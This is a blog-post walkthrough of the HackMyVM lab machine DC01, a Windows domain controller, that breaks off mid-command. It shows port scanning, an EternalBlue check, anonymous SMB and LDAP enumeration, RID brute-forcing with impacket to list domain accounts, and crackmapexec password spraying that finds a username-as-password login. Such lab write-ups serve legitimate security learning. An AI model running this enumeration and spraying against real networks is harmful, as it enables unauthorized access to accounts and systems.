{"id":783,"date":"2024-08-16T12:57:28","date_gmt":"2024-08-16T04:57:28","guid":{"rendered":"http:\/\/162.14.82.114\/?p=783"},"modified":"2024-08-16T12:57:28","modified_gmt":"2024-08-16T04:57:28","slug":"hmv-_-dc01","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/783\/08\/16\/2024\/","title":{"rendered":"hmv[-_-]DC01"},"content":{"rendered":"<h1>DC01<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257560.png\" alt=\"image-20240810203045009\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257562.png\" alt=\"image-20240810203822316\" \/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ nmap -Pn -sTCV -T4 $IP           \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-08-10 08:34 EDT\nNmap scan report for 192.168.10.102\nHost is up (0.0020s latency).\nNot shown: 989 filtered tcp ports (no-response)\nPORT     STATE SERVICE       VERSION\n53\/tcp   open  domain        Simple DNS Plus\n88\/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-08-11 03:40:33Z)\n135\/tcp  open  msrpc         Microsoft Windows RPC\n139\/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn\n389\/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)\n445\/tcp  open  microsoft-ds?\n464\/tcp  open  kpasswd5?\n593\/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n636\/tcp  open  tcpwrapped\n3268\/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)\n3269\/tcp open  tcpwrapped\nService Info: Host: DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n|_clock-skew: 15h05m49s\n| smb2-time: \n|   date: 2024-08-11T03:40:34\n|_  start_date: N\/A\n|_nbstat: NetBIOS name: DC01, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:94:55:97 (Oracle VirtualBox virtual NIC)\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled and required\n\nService detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 68.42 seconds<\/code><\/pre>\n<p>The scan shows <code>Domain: SOUPEDECODE.LOCAL0<\/code>. Domain names are generally resolved in lowercase, so add it to DNS:<\/p>\n<pre><code class=\"language-text\">192.168.10.102      soupedecode.local<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Information Gathering on Sensitive Ports<\/h3>\n<p>Port <code>445<\/code> is open, so first check whether EternalBlue can take it in one shot...<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ msfconsole -q                                                                                   \nmsf6 &gt; search ms17\n\nMatching Modules\n================\n\n   #   Name                                                  Disclosure Date  Rank     Check  Description\n   -   ----                                                  ---------------  ----     -----  -----------\n   0   exploit\/windows\/smb\/ms17_010_eternalblue              2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption\n   1     \\_ target: Automatic Target                         .                .        .      .\n   2     \\_ target: Windows 7                                .                .        .      .\n   3     \\_ target: Windows Embedded Standard 7              .                .        .      .\n   4     \\_ target: Windows Server 2008 R2                   .                .        .      .\n   5     \\_ target: Windows 8                                .                .        .      .\n   6     \\_ target: Windows 8.1                              .                .        .      .\n   7     \\_ target: Windows Server 2012                      .                .        .      
.\n   8     \\_ target: Windows 10 Pro                           .                .        .      .\n   9     \\_ target: Windows 10 Enterprise Evaluation         .                .        .      .\n   10  exploit\/windows\/smb\/ms17_010_psexec                   2017-03-14       normal   Yes    MS17-010 EternalRomance\/EternalSynergy\/EternalChampion SMB Remote Windows Code Execution\n   11    \\_ target: Automatic                                .                .        .      .\n   12    \\_ target: PowerShell                               .                .        .      .\n   13    \\_ target: Native upload                            .                .        .      .\n   14    \\_ target: MOF upload                               .                .        .      .\n   15    \\_ AKA: ETERNALSYNERGY                              .                .        .      .\n   16    \\_ AKA: ETERNALROMANCE                              .                .        .      .\n   17    \\_ AKA: ETERNALCHAMPION                             .                .        .      .\n   18    \\_ AKA: ETERNALBLUE                                 .                .        .      .\n   19  auxiliary\/admin\/smb\/ms17_010_command                  2017-03-14       normal   No     MS17-010 EternalRomance\/EternalSynergy\/EternalChampion SMB Remote Windows Command Execution\n   20    \\_ AKA: ETERNALSYNERGY                              .                .        .      .\n   21    \\_ AKA: ETERNALROMANCE                              .                .        .      .\n   22    \\_ AKA: ETERNALCHAMPION                             .                .        .      .\n   23    \\_ AKA: ETERNALBLUE                                 .                .        .      .\n   24  auxiliary\/scanner\/smb\/smb_ms17_010                    .                normal   No     MS17-010 SMB RCE Detection\n   25    \\_ AKA: DOUBLEPULSAR                                .                .        .      
.\n   26    \\_ AKA: ETERNALBLUE                                 .                .        .      .\n   27  exploit\/windows\/fileformat\/office_ms17_11882          2017-11-15       manual   No     Microsoft Office CVE-2017-11882\n   28  auxiliary\/admin\/mssql\/mssql_escalate_execute_as       .                normal   No     Microsoft SQL Server Escalate EXECUTE AS\n   29  auxiliary\/admin\/mssql\/mssql_escalate_execute_as_sqli  .                normal   No     Microsoft SQL Server SQLi Escalate Execute AS\n   30  exploit\/windows\/smb\/smb_doublepulsar_rce              2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution\n   31    \\_ target: Execute payload (x64)                    .                .        .      .\n   32    \\_ target: Neutralize implant                       .                .        .      .\n\nInteract with a module by name or index. For example info 32, use 32 or use exploit\/windows\/smb\/smb_doublepulsar_rce\nAfter interacting with a module you can manually set a TARGET with set TARGET &#039;Neutralize implant&#039;\n\nmsf6 &gt; use auxiliary\/scanner\/smb\/smb_ms17_010\nmsf6 auxiliary(scanner\/smb\/smb_ms17_010) &gt; options\n\nModule options (auxiliary\/scanner\/smb\/smb_ms17_010):\n\n   Name         Current Setting                                            Required  Description\n   ----         ---------------                                            --------  -----------\n   CHECK_ARCH   true                                                       no        Check for architecture on vulnerable hosts\n   CHECK_DOPU   true                                                       no        Check for DOUBLEPULSAR on vulnerable hosts\n   CHECK_PIPE   false                                                      no        Check for named pipe on vulnerable hosts\n   NAMED_PIPES  \/usr\/share\/metasploit-framework\/data\/wordlists\/named_pipe  yes       List of named pipes to check\n                s.txt\n   RHOSTS             
                                                     yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n   RPORT        445                                                        yes       The SMB service port (TCP)\n   SMBDomain    .                                                          no        The Windows domain to use for authentication\n   SMBPass                                                                 no        The password for the specified username\n   SMBUser                                                                 no        The username to authenticate as\n   THREADS      1                                                          yes       The number of concurrent threads (max one per host)\n\nView the full module info with the info, or info -d command.\n\nmsf6 auxiliary(scanner\/smb\/smb_ms17_010) &gt; set RHOSTS 192.168.10.102\nRHOSTS =&gt; 192.168.10.102\nmsf6 auxiliary(scanner\/smb\/smb_ms17_010) &gt; run\n\n[-] 192.168.10.102:445    - An SMB Login Error occurred while connecting to the IPC$ tree.\n[*] 192.168.10.102:445    - Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed<\/code><\/pre>\n<p>Looks like that does not work, so let's go through it step by step....<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ smbmap -H 192.168.10.102\n\n    ________  ___      ___  _______   ___      ___       __         _______\n   \/&quot;       )|&quot;  \\    \/&quot;  ||   _  &quot;\\ |&quot;  \\    \/&quot;  |     \/&quot;&quot;\\       |   __ &quot;\\\n  (:   \\___\/  \\   \\  \/\/   |(. |_)  :) \\   \\  \/\/   |    \/    \\      (. |__) :)\n   \\___  \\    \/\\  \\\/.    ||:     \\\/   \/\\   \\\/.    |   \/&#039; \/\\  \\     |:  ____\/\n    __\/  \\   |: \\.        |(|  _  \\  |: \\.        |  \/\/  __&#039;  \\    (|  \/\n   \/&quot; \\   :) |.  
\\    \/:  ||: |_)  :)|.  \\    \/:  | \/   \/  \\   \\  \/|__\/ \\\n  (_______\/  |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/    \\___)(_______)\n -----------------------------------------------------------------------------\n     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n                     https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB\n[*] Established 0 SMB session(s)                                \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ smbmap -H 192.168.10.102 -u anonymous\n\n    ________  ___      ___  _______   ___      ___       __         _______\n   \/&quot;       )|&quot;  \\    \/&quot;  ||   _  &quot;\\ |&quot;  \\    \/&quot;  |     \/&quot;&quot;\\       |   __ &quot;\\\n  (:   \\___\/  \\   \\  \/\/   |(. |_)  :) \\   \\  \/\/   |    \/    \\      (. |__) :)\n   \\___  \\    \/\\  \\\/.    ||:     \\\/   \/\\   \\\/.    |   \/&#039; \/\\  \\     |:  ____\/\n    __\/  \\   |: \\.        |(|  _  \\  |: \\.        |  \/\/  __&#039;  \\    (|  \/\n   \/&quot; \\   :) |.  \\    \/:  ||: |_)  :)|.  
\\    \/:  | \/   \/  \\   \\  \/|__\/ \\\n  (_______\/  |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/    \\___)(_______)\n -----------------------------------------------------------------------------\n     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n                     https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB\n[*] Established 1 SMB session(s)                                \n\n[+] IP: 192.168.10.102:445      Name: 192.168.10.102            Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        ADMIN$                                                  NO ACCESS       Remote Admin\n        backup                                                  NO ACCESS\n        C$                                                      NO ACCESS       Default share\n        IPC$                                                    READ ONLY       Remote IPC\n        NETLOGON                                                NO ACCESS       Logon server share \n        SYSVOL                                                  NO ACCESS       Logon server share \n        Users                                                   NO ACCESS<\/code><\/pre>\n<p>With the default user <code>anonymous<\/code>, the <code>IPC$<\/code> share turns out to be readable, so try reading it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ smbclient \/\/$IP\/IPC$             \nPassword for [WORKGROUP\\kali]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; dir\nNT_STATUS_NO_SUCH_FILE listing 
\\*<\/code><\/pre>\n<p>The anonymous user has no permissions... Try looking at something else; the domain name resolution above came to mind, though I am not sure whether it is useful:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257564.png\" alt=\"image-20240810205916536\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257565.png\" alt=\"image-20240810211023448\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257566.png\" alt=\"image-20240810211048003\" \/><\/p>\n<p>Try gathering information:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ ldapsearch -x -H ldap:\/\/$IP -D &#039;&#039; -w &#039;&#039; -b &quot;DC=soupedecode,DC=local&quot;\n# extended LDIF\n#\n# LDAPv3\n# base &lt;DC=soupedecode,DC=local&gt; with scope subtree\n# filter: (objectclass=*)\n# requesting: ALL\n#\n\n# search result\nsearch: 2\nresult: 1 Operations error\ntext: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this opera\n tion a successful bind must be completed on the connection., data 0, v4f7c\n\n# numResponses: 1<\/code><\/pre>\n<p>It seems to have succeeded, yet it also seems not to work... Try it first without the domain:<\/p>\n<pre><code class=\"language-bash\">ldapsearch -x -H ldap:\/\/$IP -D &#039;&#039; -w &#039;&#039; -b &#039;&#039; -s base &quot;(objectclass=user)&quot;<\/code><\/pre>\n<blockquote>\n<ul>\n<li><code>-x<\/code>: Connect using the simple bind method. This disables STARTTLS encryption; if the LDAP server supports STARTTLS, the <code>-x<\/code> parameter bypasses it.<\/li>\n<li><code>-H<\/code>: Specifies the location of the LDAP server. Here <code>$IP<\/code> should be replaced with the actual LDAP server IP address or hostname.<\/li>\n<li><code>-D<\/code>: Specifies the DN (Distinguished Name) used for the bind operation. The empty string <code>&#039;&#039;<\/code> is used here, which means no specific DN is given, so an anonymous bind is performed or the default anonymous DN is used.<\/li>\n<li><code>-w<\/code>: Specifies the password used for the bind operation. Likewise, the empty string <code>&#039;&#039;<\/code> here means no password.<\/li>\n<li><code>-b<\/code>: Specifies the base DN of the search, that is, the starting point of the search. The empty string <code>&#039;&#039;<\/code> is used here as well, which means using the default base DN or trying to search from the root.<\/li>\n<li><code>-s base<\/code>: Specifies the search scope. <code>base<\/code> means only the object corresponding to the base DN itself is returned, not its child objects.<\/li>\n<li><code>&quot;(objectclass=user)&quot;<\/code>: This is the LDAP search filter, meaning only entries whose <code>objectClass<\/code> attribute value is <code>user<\/code> are returned.<\/li>\n<\/ul>\n<\/blockquote>\n<pre><code class=\"language-bash\"># extended LDIF\n#\n# LDAPv3\n# base &lt;&gt; with scope baseObject\n# filter: (objectclass=user)\n# requesting: ALL\n#\n\n#\ndn:\ndomainFunctionality: 7\nforestFunctionality: 7\ndomainControllerFunctionality: 7\nrootDomainNamingContext: DC=SOUPEDECODE,DC=LOCAL\nldapServiceName: 
SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL\nisGlobalCatalogReady: TRUE\nsupportedSASLMechanisms: GSSAPI\nsupportedSASLMechanisms: GSS-SPNEGO\nsupportedSASLMechanisms: EXTERNAL\nsupportedSASLMechanisms: DIGEST-MD5\nsupportedLDAPVersion: 3\nsupportedLDAPVersion: 2\nsupportedLDAPPolicies: MaxPoolThreads\nsupportedLDAPPolicies: MaxPercentDirSyncRequests\nsupportedLDAPPolicies: MaxDatagramRecv\nsupportedLDAPPolicies: MaxReceiveBuffer\nsupportedLDAPPolicies: InitRecvTimeout\nsupportedLDAPPolicies: MaxConnections\nsupportedLDAPPolicies: MaxConnIdleTime\nsupportedLDAPPolicies: MaxPageSize\nsupportedLDAPPolicies: MaxBatchReturnMessages\nsupportedLDAPPolicies: MaxQueryDuration\nsupportedLDAPPolicies: MaxDirSyncDuration\nsupportedLDAPPolicies: MaxTempTableSize\nsupportedLDAPPolicies: MaxResultSetSize\nsupportedLDAPPolicies: MinResultSets\nsupportedLDAPPolicies: MaxResultSetsPerConn\nsupportedLDAPPolicies: MaxNotificationPerConn\nsupportedLDAPPolicies: MaxValRange\nsupportedLDAPPolicies: MaxValRangeTransitive\nsupportedLDAPPolicies: ThreadMemoryLimit\nsupportedLDAPPolicies: SystemMemoryLimitPercent\nsupportedControl: 1.2.840.113556.1.4.319\nsupportedControl: 1.2.840.113556.1.4.801\nsupportedControl: 1.2.840.113556.1.4.473\nsupportedControl: 1.2.840.113556.1.4.528\nsupportedControl: 1.2.840.113556.1.4.417\nsupportedControl: 1.2.840.113556.1.4.619\nsupportedControl: 1.2.840.113556.1.4.841\nsupportedControl: 1.2.840.113556.1.4.529\nsupportedControl: 1.2.840.113556.1.4.805\nsupportedControl: 1.2.840.113556.1.4.521\nsupportedControl: 1.2.840.113556.1.4.970\nsupportedControl: 1.2.840.113556.1.4.1338\nsupportedControl: 1.2.840.113556.1.4.474\nsupportedControl: 1.2.840.113556.1.4.1339\nsupportedControl: 1.2.840.113556.1.4.1340\nsupportedControl: 1.2.840.113556.1.4.1413\nsupportedControl: 2.16.840.1.113730.3.4.9\nsupportedControl: 2.16.840.1.113730.3.4.10\nsupportedControl: 1.2.840.113556.1.4.1504\nsupportedControl: 1.2.840.113556.1.4.1852\nsupportedControl: 
1.2.840.113556.1.4.802\nsupportedControl: 1.2.840.113556.1.4.1907\nsupportedControl: 1.2.840.113556.1.4.1948\nsupportedControl: 1.2.840.113556.1.4.1974\nsupportedControl: 1.2.840.113556.1.4.1341\nsupportedControl: 1.2.840.113556.1.4.2026\nsupportedControl: 1.2.840.113556.1.4.2064\nsupportedControl: 1.2.840.113556.1.4.2065\nsupportedControl: 1.2.840.113556.1.4.2066\nsupportedControl: 1.2.840.113556.1.4.2090\nsupportedControl: 1.2.840.113556.1.4.2205\nsupportedControl: 1.2.840.113556.1.4.2204\nsupportedControl: 1.2.840.113556.1.4.2206\nsupportedControl: 1.2.840.113556.1.4.2211\nsupportedControl: 1.2.840.113556.1.4.2239\nsupportedControl: 1.2.840.113556.1.4.2255\nsupportedControl: 1.2.840.113556.1.4.2256\nsupportedControl: 1.2.840.113556.1.4.2309\nsupportedControl: 1.2.840.113556.1.4.2330\nsupportedControl: 1.2.840.113556.1.4.2354\nsupportedCapabilities: 1.2.840.113556.1.4.800\nsupportedCapabilities: 1.2.840.113556.1.4.1670\nsupportedCapabilities: 1.2.840.113556.1.4.1791\nsupportedCapabilities: 1.2.840.113556.1.4.1935\nsupportedCapabilities: 1.2.840.113556.1.4.2080\nsupportedCapabilities: 1.2.840.113556.1.4.2237\nsubschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=L\n OCAL\nserverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configur\n ation,DC=SOUPEDECODE,DC=LOCAL\nschemaNamingContext: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\nnamingContexts: DC=SOUPEDECODE,DC=LOCAL\nnamingContexts: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\nnamingContexts: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\nnamingContexts: DC=DomainDnsZones,DC=SOUPEDECODE,DC=LOCAL\nnamingContexts: DC=ForestDnsZones,DC=SOUPEDECODE,DC=LOCAL\nisSynchronized: TRUE\nhighestCommittedUSN: 45084\ndsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,\n CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\ndnsHostName: DC01.SOUPEDECODE.LOCAL\ndefaultNamingContext: DC=SOUPEDECODE,DC=LOCAL\ncurrentTime: 
20240811041058.0Z\nconfigurationNamingContext: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n\n# search result\nsearch: 2\nresult: 0 Success\n\n# numResponses: 2\n# numEntries: 1<\/code><\/pre>\n<p>The same domain name identifier seen earlier shows up here as well; if it had not been given, this would be the place to start!<\/p>\n<p><strong>Using <code>ldapsearch<\/code>:<\/strong><\/p>\n<ul>\n<li>The goal is to obtain the user list from the LDAP server, including usernames and other information. This can be done anonymously or with authentication.<\/li>\n<li>Through LDAP queries, the users' DNs (Distinguished Names) can be collected; a DN is the string LDAP uses to uniquely identify a user account.<\/li>\n<\/ul>\n<p><strong>Next, try using <code>lookupsid<\/code>:<\/strong><\/p>\n<ul>\n<li>After obtaining the user list, the next step may be to get each user's SID (Security Identifier). This is because some operations, such as file permission checks or simulated logons, may need the SID rather than the username.<\/li>\n<li><code>lookupsid<\/code> can look up the corresponding SID from a user's DN or username.<\/li>\n<\/ul>\n<p><a href=\"https:\/\/github.com\/fortra\/impacket\/blob\/master\/examples\/lookupsid.py\">https:\/\/github.com\/fortra\/impacket\/blob\/master\/examples\/lookupsid.py<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ python3 lookupsid.py                               
  \nImpacket v0.12.0.dev1 - Copyright 2023 Fortra\n\nusage: lookupsid.py [-h] [-ts] [-target-ip ip address] [-port [destination port]] [-domain-sids] [-hashes LMHASH:NTHASH] [-no-pass] [-k] target [maxRid]\n\npositional arguments:\n  target                [[domain\/]username[:password]@]&lt;targetName or address&gt;\n  maxRid                max Rid to check (default 4000)\n\noptions:\n  -h, --help            show this help message and exit\n  -ts                   Adds timestamp to every logging output\n\nconnection:\n  -target-ip ip address\n                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it\n  -port [destination port]\n                        Destination port to connect to SMB Server\n  -domain-sids          Enumerate Domain SIDs (will likely forward requests to the DC)\n\nauthentication:\n  -hashes LMHASH:NTHASH\n                        NTLM hashes, format is LMHASH:NTHASH\n  -no-pass              don&#039;t ask for password (useful when proxying through smbrelayx)\n  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. 
If valid credentials cannot be found, it will use the ones\n                        specified in the command line\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ python3 lookupsid.py soupedecode.local\/anonymous@$IP\nImpacket v0.12.0.dev1 - Copyright 2023 Fortra\n\nPassword:\n[*] Brute forcing SIDs at 192.168.10.102\n[*] StringBinding ncacn_np:192.168.10.102[\\pipe\\lsarpc]\n[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164\n498: SOUPEDECODE\\Enterprise Read-only Domain Controllers (SidTypeGroup)\n500: SOUPEDECODE\\Administrator (SidTypeUser)\n501: SOUPEDECODE\\Guest (SidTypeUser)\n502: SOUPEDECODE\\krbtgt (SidTypeUser)\n512: SOUPEDECODE\\Domain Admins (SidTypeGroup)\n513: SOUPEDECODE\\Domain Users (SidTypeGroup)\n514: SOUPEDECODE\\Domain Guests (SidTypeGroup)\n515: SOUPEDECODE\\Domain Computers (SidTypeGroup)\n516: SOUPEDECODE\\Domain Controllers (SidTypeGroup)\n517: SOUPEDECODE\\Cert Publishers (SidTypeAlias)\n518: SOUPEDECODE\\Schema Admins (SidTypeGroup)\n519: SOUPEDECODE\\Enterprise Admins (SidTypeGroup)\n520: SOUPEDECODE\\Group Policy Creator Owners (SidTypeGroup)\n521: SOUPEDECODE\\Read-only Domain Controllers (SidTypeGroup)\n522: SOUPEDECODE\\Cloneable Domain Controllers (SidTypeGroup)\n..........\n2154: SOUPEDECODE\\PC-82$ (SidTypeUser)\n2155: SOUPEDECODE\\PC-83$ (SidTypeUser)\n2156: SOUPEDECODE\\PC-84$ (SidTypeUser)\n2157: SOUPEDECODE\\PC-85$ (SidTypeUser)\n2158: SOUPEDECODE\\PC-86$ (SidTypeUser)\n2159: SOUPEDECODE\\PC-87$ (SidTypeUser)\n2160: SOUPEDECODE\\PC-88$ (SidTypeUser)\n2161: SOUPEDECODE\\PC-89$ (SidTypeUser)\n2162: SOUPEDECODE\\PC-90$ (SidTypeUser)\n2163: SOUPEDECODE\\firewall_svc (SidTypeUser)\n2164: SOUPEDECODE\\backup_svc (SidTypeUser)\n2165: SOUPEDECODE\\web_svc (SidTypeUser)\n2166: SOUPEDECODE\\monitoring_svc 
(SidTypeUser)<\/code><\/pre>\n<h3>Brute-forcing the SMB Service<\/h3>\n<p>Try extracting the relevant strings so the SMB service can be brute-forced afterwards. First copy the output into a folder, then try to process it. After consulting the group owner (awesome plus.jpg), I got several approaches:<\/p>\n<pre><code class=\"language-bash\"># grep -P &#039;(?&lt;=\\\\)[^ ]+&#039; -o\n# cat dic|awk -F&#039;[ \\\\\\\\]+&#039; &#039;{print $3}&#039;    the one I strongly insisted on, because this is the form I wrote and got wrong; in awk one \\ needs four \\ to escape it\n# cat dic|sed &#039;s+\\\\+\/+g&#039;|awk -F&#039;[ \/]+&#039; &#039;{print $3}&#039;\n# Enhanced version, the name may be one or two words\n# cat dic|awk -F&#039;[(\\\\\\\\]+&#039; &#039;{print $2}&#039;\n# cat dic|grep -P &#039;(?&lt;=\\\\)[^(]+(?= )&#039;\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ crackmapexec -h                             \nusage: crackmapexec [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--darrell] [--verbose] {smb,mssql,winrm,ldap,ftp,rdp,ssh} ...\n\n      ______ .______           ___        ______  __  ___ .___  ___.      ___      .______    _______ ___   ___  _______   ______\n     \/      ||   _  \\         \/   \\      \/      ||  |\/  \/ |   \\\/   |     \/   \\     |   _  \\  |   ____|\\  \\ \/  \/ |   ____| \/      |\n    |  ,----&#039;|  |_)  |       \/  ^  \\    |  ,----&#039;|  &#039;  \/  |  \\  \/  |    \/  ^  \\    |  |_)  | |  |__    \\  V  \/  |  |__   |  ,----&#039;\n    |  |     |      \/       \/  \/_\\  \\   |  |     |    &lt;   |  |\\\/|  |   \/  \/_\\  \\   |   ___\/  |   __|    &gt;   &lt;   |   __|  |  |\n    |  `----.|  |\\  \\----. \/  _____  \\  |  `----.|  .  
\\  |  |  |  |  \/  _____  \\  |  |      |  |____  \/  .  \\  |  |____ |  `----.\n     \\______|| _| `._____|\/__\/     \\__\\  \\______||__|\\__\\ |__|  |__| \/__\/     \\__\\ | _|      |_______|\/__\/ \\__\\ |_______| \\______|\n\n                                                A swiss army knife for pentesting networks\n                                    Forged by @byt3bl33d3r and @mpgn_x64 using the powah of dank memes\n\n                                           Exclusive release for Porchetta Industries users\n                                                       https:\/\/porchetta.industries\/\n\n                                                   Version : 5.4.0\n                                                   Codename: Indestructible G0thm0g\n\noptions:\n  -h, --help            show this help message and exit\n  -t THREADS            set how many concurrent threads to use (default: 100)\n  --timeout TIMEOUT     max timeout in seconds of each thread (default: None)\n  --jitter INTERVAL     sets a random delay between each connection (default: None)\n  --darrell             give Darrell a hand\n  --verbose             enable verbose output\n\nprotocols:\n  available protocols\n\n  {smb,mssql,winrm,ldap,ftp,rdp,ssh}\n    smb                 own stuff using SMB\n    mssql               own stuff using MSSQL\n    winrm               own stuff using WINRM\n    ldap                own stuff using LDAP\n    ftp                 own stuff using FTP\n    rdp                 own stuff using RDP\n    ssh                 own stuff using SSH\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ crackmapexec smb $IP -u temp -p temp\nSMB         192.168.10.102  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)\nSMB         192.168.10.102  445    DC01             [+] 
SOUPEDECODE.LOCAL\\Enterprise:Enterprise<\/code><\/pre>\n<p>Wow, the very first one is a hit, let's go!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ smbmap -H 192.168.10.102 -u Enterprise\n\n    ________  ___      ___  _______   ___      ___       __         _______\n   \/&quot;       )|&quot;  \\    \/&quot;  ||   _  &quot;\\ |&quot;  \\    \/&quot;  |     \/&quot;&quot;\\       |   __ &quot;\\\n  (:   \\___\/  \\   \\  \/\/   |(. |_)  :) \\   \\  \/\/   |    \/    \\      (. |__) :)\n   \\___  \\    \/\\  \\\/.    ||:     \\\/   \/\\   \\\/.    |   \/&#039; \/\\  \\     |:  ____\/\n    __\/  \\   |: \\.        |(|  _  \\  |: \\.        |  \/\/  __&#039;  \\    (|  \/\n   \/&quot; \\   :) |.  \\    \/:  ||: |_)  :)|.  \\    \/:  | \/   \/  \\   \\  \/|__\/ \\\n  (_______\/  |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/    \\___)(_______)\n -----------------------------------------------------------------------------\n     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n                     https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB\n[*] Established 1 SMB session(s)                                \n\n[+] IP: 192.168.10.102:445      Name: soupedecode.local         Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        ADMIN$                                                  NO ACCESS       Remote Admin\n        backup                                                  NO ACCESS\n        C$                                                      NO ACCESS       Default share\n        IPC$                                                    READ ONLY       Remote IPC\n        NETLOGON                                                NO ACCESS       Logon server share 
\n        SYSVOL                                                  NO ACCESS       Logon server share \n        Users                                                   NO ACCESS<\/code><\/pre>\n<p>Try taking a look:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ smbclient \/\/192.168.10.102\/$IPC -U Enterprise\nPassword for [WORKGROUP\\Enterprise]:<\/code><\/pre>\n<p>Nothing there. Hmm, I mistyped it; take another look!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ smbclient \/\/192.168.10.102\/IPC$ -U Enterprise\nPassword for [WORKGROUP\\Enterprise]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; dir\nNT_STATUS_NO_SUCH_FILE listing \\*\nsmb: \\&gt; ls\nNT_STATUS_NO_SUCH_FILE listing \\*\nsmb: \\&gt; pwd\nCurrent directory is \\\\192.168.10.102\\IPC$\\<\/code><\/pre>\n<p>Still no good. Keep going and check the other users, without stopping on a success, to see how many succeed! To reduce the brute-force load, first check the accounts whose password is the same as the username!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ crackmapexec smb $IP -u temp -p temp --continue-on-success --no-bruteforce | grep -v &quot;FAILURE&quot;\nSMB                      